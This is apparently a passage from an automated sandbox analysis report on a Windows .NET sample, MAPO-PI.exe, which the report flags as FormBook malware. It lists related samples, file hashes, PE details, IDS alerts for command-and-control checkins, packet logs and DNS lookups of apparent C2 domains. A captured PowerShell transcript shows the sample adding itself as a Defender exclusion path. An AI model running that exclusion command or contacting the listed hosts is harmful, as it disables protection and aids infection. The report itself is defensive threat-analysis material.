                                • 161.35.54.166
                                9ecqofrtuoGet hashmaliciousBrowse
                                • 161.35.54.166
                                vx69bSxRQaGet hashmaliciousBrowse
                                • 161.35.54.166
                                8Xm9hcPRW9Get hashmaliciousBrowse
                                • 161.35.54.166
                                hVq8pSanzKGet hashmaliciousBrowse
                                • 161.35.54.166
                                t0rtYC582wGet hashmaliciousBrowse
                                • 161.35.54.166
                                JpvnaZB6aUGet hashmaliciousBrowse
                                • 161.35.54.166
                                GBlokuLqdgGet hashmaliciousBrowse
                                • 161.35.54.166
                                DpK5nUwiwE.exeGet hashmaliciousBrowse
                                • 159.89.117.132
                                GU5kmLwV7r.exeGet hashmaliciousBrowse
                                • 157.245.5.40
                                peSZa2MV75.exeGet hashmaliciousBrowse
                                • 157.245.5.40
                                AEROTEK-ASTR2FNlQLySZS.exeGet hashmaliciousBrowse
                                • 94.199.200.61
                                Tips Ref.exeGet hashmaliciousBrowse
                                • 94.199.200.62
                                RFQ NO. T01777ENQ-0090F8.exeGet hashmaliciousBrowse
                                • 109.232.217.77
                                PO12031.exeGet hashmaliciousBrowse
                                • 94.199.200.62
                                Halkbank_Ekstre_20210726_084931-069855PDF.exeGet hashmaliciousBrowse
                                • 94.199.200.62
                                Ziraat Bankas#U0131 Swift Mesaj#U0131.exeGet hashmaliciousBrowse
                                • 37.230.104.41
                                Ehsu0xgexofjfX9.exeGet hashmaliciousBrowse
                                • 178.157.8.3
                                KNm3lXniFj.exeGet hashmaliciousBrowse
                                • 109.232.216.164
                                Halkbank_Ekstre_20210309_080203_744632.PDF.exeGet hashmaliciousBrowse
                                • 94.199.200.87
                                doc2019291888001990.pdf.exeGet hashmaliciousBrowse
                                • 94.199.200.87
                                kuKyYYYuS0.exeGet hashmaliciousBrowse
                                • 31.207.83.53
                                4zfdibTbxl.exeGet hashmaliciousBrowse
                                • 31.207.83.53
                                W0HuUhFe5Kma3EO.exeGet hashmaliciousBrowse
                                • 178.157.8.3
                                INVOICE 5204.exeGet hashmaliciousBrowse
                                • 31.207.83.53
                                80893_payslip.exeGet hashmaliciousBrowse
                                • 94.199.200.62
                                2UZ8zLT94pJEufW.exeGet hashmaliciousBrowse
                                • 178.157.8.3
                                hesaphareketi-01.pdf.exeGet hashmaliciousBrowse
                                • 94.199.200.87
                                hesaphareketi-01.pdf.exeGet hashmaliciousBrowse
                                • 94.199.200.87
                                Transfer receipt Copy 1038690332210516.exeGet hashmaliciousBrowse
                                • 94.199.200.62
                                60rUtFJPFb.exeGet hashmaliciousBrowse
                                • 94.199.200.203

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MAPO-PI.exe.log
                                Process:C:\Users\user\Desktop\MAPO-PI.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1216
                                Entropy (8bit):5.355304211458859
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                Malicious:true
                                Reputation:high, very likely benign file
                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):22216
                                Entropy (8bit):5.605411736270381
                                Encrypted:false
                                SSDEEP:384:itCD3q0uQVhlitckG2mRkSBKn8jultIar7Y9g9SJ3xqT1MaXZlbAV7qWDuZBDI+g:jVr4ckN4K8Clt1v9cQCufwUVW
                                MD5:95B172E74C7587008D47DD07599466DF
                                SHA1:F109393BB49245183CF3EF821B4CF467A99ABB0B
                                SHA-256:9CD70D7F52085B373DD40A8B3B03E568431FBA0DAA51A589D17FCC773438A3FF
                                SHA-512:CAA1486D47A143B23E4731942B6477A338E389EDBD4ABFD49FF7737AC93827BFE384E130E1F04DDEC3CB2D73B7584B77CC1FA952706B65E6389EE08C31A2CE65
                                Malicious:false
                                Reputation:low
                                Preview: @...e...........j.......h...j.^.[.........H..........@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lhm0t1yh.nml.psm1
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview: 1
                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p05gvjwq.ucq.ps1
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview: 1
                                C:\Users\user\Documents\20211028\PowerShell_transcript.855271.6SnYDjtu.20211028074006.txt
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):5707
                                Entropy (8bit):5.381930049255417
                                Encrypted:false
                                SSDEEP:96:BZjS/CN0S3qDo1ZpnRZz/CN0S3qDo1Z+4d+dQdjZW/CN0S3qDo1Zp5dAdAdOZh:fRn
                                MD5:7A5FF84148F6EB95DFAF4DE3120DC911
                                SHA1:D168B38F281F305B45596159FE835682DEE2BF11
                                SHA-256:053633604A80FDB3DFAFFB3D6E2DE3BE2A43F5C21A879683F57B6A74B5069EAA
                                SHA-512:FAD1460ED07176682C12624C401EDF38ED9C068BB0C3BE6C3909526C68E6135EDD04F64C576C79AF8526B1AB922A57566CBC9E10AA63BDCB8BE7D2167D07F43B
                                Malicious:false
                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20211028074007..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 855271 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\MAPO-PI.exe..Process ID: 2592..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211028074007..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\MAPO-PI.exe..**********************..Windows PowerShell transcript start..Start time: 20211028074325..Username: computer\user..RunAs User: computer\user..Configuration

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):6.69902416121267
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                • DOS Executable Generic (2002/1) 0.01%
                                File name:MAPO-PI.exe
                                File size:532992
                                MD5:c619bbbe3c374c8fd3e9f2c26d087496
                                SHA1:a8f7e80f2c8e7687789f2267935610f81bc773d4
                                SHA256:260b61ddee5133e450110555cf0675ad6c015f51e6053c8fdc169db5e01bf993
                                SHA512:754a8e96edeb6c2dc63a7530c7d791b2852cce2a90ee477de446d9ffd9304e8934a8e7088a34127643804c569cf8d40102e8a2c0867f57d6fa6e39cd9cc6b5a2
                                SSDEEP:6144:CR5D/Qa1Hyw3Q3+3pajySWnMTritfg/784KxvFurGagGlkmOv7:2B/Qa1HyT4ajvSeitfWXKxdaWmI7
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ya..............0......D........... ........@.. ....................................@................................

                                File Icon

                                Icon Hash:31b0b4b6b6b6b031

                                Static PE Info

                                General

                                Entrypoint:0x47fb82
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                Time Stamp:0x6179BDEA [Wed Oct 27 21:00:26 2021 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:v4.0.30319
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                Entrypoint Preview

                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x7fb300x4f.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x800000x4198.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000xc.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x20000x7db880x7dc00False0.683504442097data6.69285851481IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                .rsrc0x800000x41980x4200False0.244377367424data4.6611198492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x860000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountry
                                RT_ICON0x801900x468GLS_BINARY_LSB_FIRST
                                RT_ICON0x805f80x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4280185157, next used block 4280185157
                                RT_ICON0x816a00x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4280185157, next used block 4280185157
                                RT_GROUP_ICON0x83c480x30data
                                RT_VERSION0x83c780x334data
                                RT_MANIFEST0x83fac0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                Imports

                                DLLImport
                                mscoree.dll_CorExeMain

                                Version Infos

                                DescriptionData
                                Translation0x0000 0x04b0
                                LegalCopyrightDelchamps 2015
                                Assembly Version7.3.0.0
                                InternalNameDebugVi.exe
                                FileVersion7.3.0.0
                                CompanyNameDelchamps
                                LegalTrademarks
                                Comments
                                ProductNamePlatformer_AI
                                ProductVersion7.3.0.0
                                FileDescriptionPlatformer_AI
                                OriginalFilenameDebugVi.exe

                                Network Behavior

                                Snort IDS Alerts

                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                10/28/21-07:41:15.191108TCP1201ATTACK-RESPONSES 403 Forbidden804978334.102.136.180192.168.2.5
                                10/28/21-07:41:56.621298TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979580192.168.2.5109.232.217.55
                                10/28/21-07:41:56.621298TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979580192.168.2.5109.232.217.55
                                10/28/21-07:41:56.621298TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979580192.168.2.5109.232.217.55

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Oct 28, 2021 07:41:14.985654116 CEST4978380192.168.2.534.102.136.180
                                Oct 28, 2021 07:41:15.004791975 CEST804978334.102.136.180192.168.2.5
                                Oct 28, 2021 07:41:15.005037069 CEST4978380192.168.2.534.102.136.180
                                Oct 28, 2021 07:41:15.005089998 CEST4978380192.168.2.534.102.136.180
                                Oct 28, 2021 07:41:15.024245977 CEST804978334.102.136.180192.168.2.5
                                Oct 28, 2021 07:41:15.191107988 CEST804978334.102.136.180192.168.2.5
                                Oct 28, 2021 07:41:15.191155910 CEST804978334.102.136.180192.168.2.5
                                Oct 28, 2021 07:41:15.191339016 CEST4978380192.168.2.534.102.136.180
                                Oct 28, 2021 07:41:15.191395044 CEST4978380192.168.2.534.102.136.180
                                Oct 28, 2021 07:41:15.210391998 CEST804978334.102.136.180192.168.2.5
                                Oct 28, 2021 07:41:35.426865101 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:35.714111090 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:35.714248896 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:35.714570045 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:35.999416113 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.150578976 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.150625944 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.150654078 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.150681019 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.150707006 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.150728941 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.150736094 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.150758982 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.150765896 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.150790930 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.150805950 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.150819063 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.150846004 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.150856972 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.150897026 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.221513033 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.435035944 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435070992 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435086966 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435103893 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435115099 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.435120106 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435137033 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435138941 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.435153961 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435170889 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435177088 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.435187101 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435194969 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.435204983 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435220957 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435229063 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.435237885 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435254097 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435261011 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.435271025 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435288906 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435327053 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.435331106 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.435336113 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435357094 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.435389042 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435389042 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.435405016 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435420990 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435424089 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.435435057 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435442924 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.435461044 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.435478926 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.505846024 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.505939007 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:56.565773010 CEST4979580192.168.2.5109.232.217.55
                                Oct 28, 2021 07:41:56.620723963 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.621105909 CEST4979580192.168.2.5109.232.217.55
                                Oct 28, 2021 07:41:56.621298075 CEST4979580192.168.2.5109.232.217.55
                                Oct 28, 2021 07:41:56.676815987 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.921601057 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.921631098 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.921644926 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.921662092 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.921678066 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.921694040 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.921710014 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.921714067 CEST4979580192.168.2.5109.232.217.55
                                Oct 28, 2021 07:41:56.921726942 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.921742916 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.921758890 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.921760082 CEST4979580192.168.2.5109.232.217.55
                                Oct 28, 2021 07:41:56.921780109 CEST4979580192.168.2.5109.232.217.55
                                Oct 28, 2021 07:41:56.921808958 CEST4979580192.168.2.5109.232.217.55
                                Oct 28, 2021 07:41:56.976444960 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.976504087 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.976521969 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.976537943 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.976552963 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.976568937 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.976584911 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.976602077 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.976617098 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.976634026 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.976633072 CEST4979580192.168.2.5109.232.217.55
                                Oct 28, 2021 07:41:56.976650000 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.976666927 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.976778030 CEST4979580192.168.2.5109.232.217.55
                                Oct 28, 2021 07:41:56.977653027 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.977674007 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.977884054 CEST4979580192.168.2.5109.232.217.55
                                Oct 28, 2021 07:41:56.977989912 CEST4979580192.168.2.5109.232.217.55
                                Oct 28, 2021 07:41:57.033845901 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:57.033869028 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:57.033876896 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:57.033962011 CEST4979580192.168.2.5109.232.217.55
                                Oct 28, 2021 07:41:57.034013033 CEST4979580192.168.2.5109.232.217.55
                                Oct 28, 2021 07:41:57.034029007 CEST4979580192.168.2.5109.232.217.55

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Oct 28, 2021 07:41:14.957154036 CEST6544753192.168.2.58.8.8.8
                                Oct 28, 2021 07:41:14.980756044 CEST53654478.8.8.8192.168.2.5
                                Oct 28, 2021 07:41:35.400157928 CEST6217653192.168.2.58.8.8.8
                                Oct 28, 2021 07:41:35.425120115 CEST53621768.8.8.8192.168.2.5
                                Oct 28, 2021 07:41:56.544334888 CEST6318353192.168.2.58.8.8.8
                                Oct 28, 2021 07:41:56.564491987 CEST53631838.8.8.8192.168.2.5

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                Oct 28, 2021 07:41:14.957154036 CEST192.168.2.58.8.8.80xebaStandard query (0)www.lifeinformpodcast.comA (IP address)IN (0x0001)
                                Oct 28, 2021 07:41:35.400157928 CEST192.168.2.58.8.8.80x97dcStandard query (0)www.transforming-leadership.comA (IP address)IN (0x0001)
                                Oct 28, 2021 07:41:56.544334888 CEST192.168.2.58.8.8.80xf306Standard query (0)www.diofis.comA (IP address)IN (0x0001)

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                Oct 28, 2021 07:41:14.980756044 CEST8.8.8.8192.168.2.50xebaNo error (0)www.lifeinformpodcast.comlifeinformpodcast.comCNAME (Canonical name)IN (0x0001)
                                Oct 28, 2021 07:41:14.980756044 CEST8.8.8.8192.168.2.50xebaNo error (0)lifeinformpodcast.com34.102.136.180A (IP address)IN (0x0001)
                                Oct 28, 2021 07:41:35.425120115 CEST8.8.8.8192.168.2.50x97dcNo error (0)www.transforming-leadership.com159.65.10.143A (IP address)IN (0x0001)
                                Oct 28, 2021 07:41:56.564491987 CEST8.8.8.8192.168.2.50xf306No error (0)www.diofis.comdiofis.comCNAME (Canonical name)IN (0x0001)
                                Oct 28, 2021 07:41:56.564491987 CEST8.8.8.8192.168.2.50xf306No error (0)diofis.com109.232.217.55A (IP address)IN (0x0001)

                                HTTP Request Dependency Graph

                                • www.lifeinformpodcast.com
                                • www.transforming-leadership.com
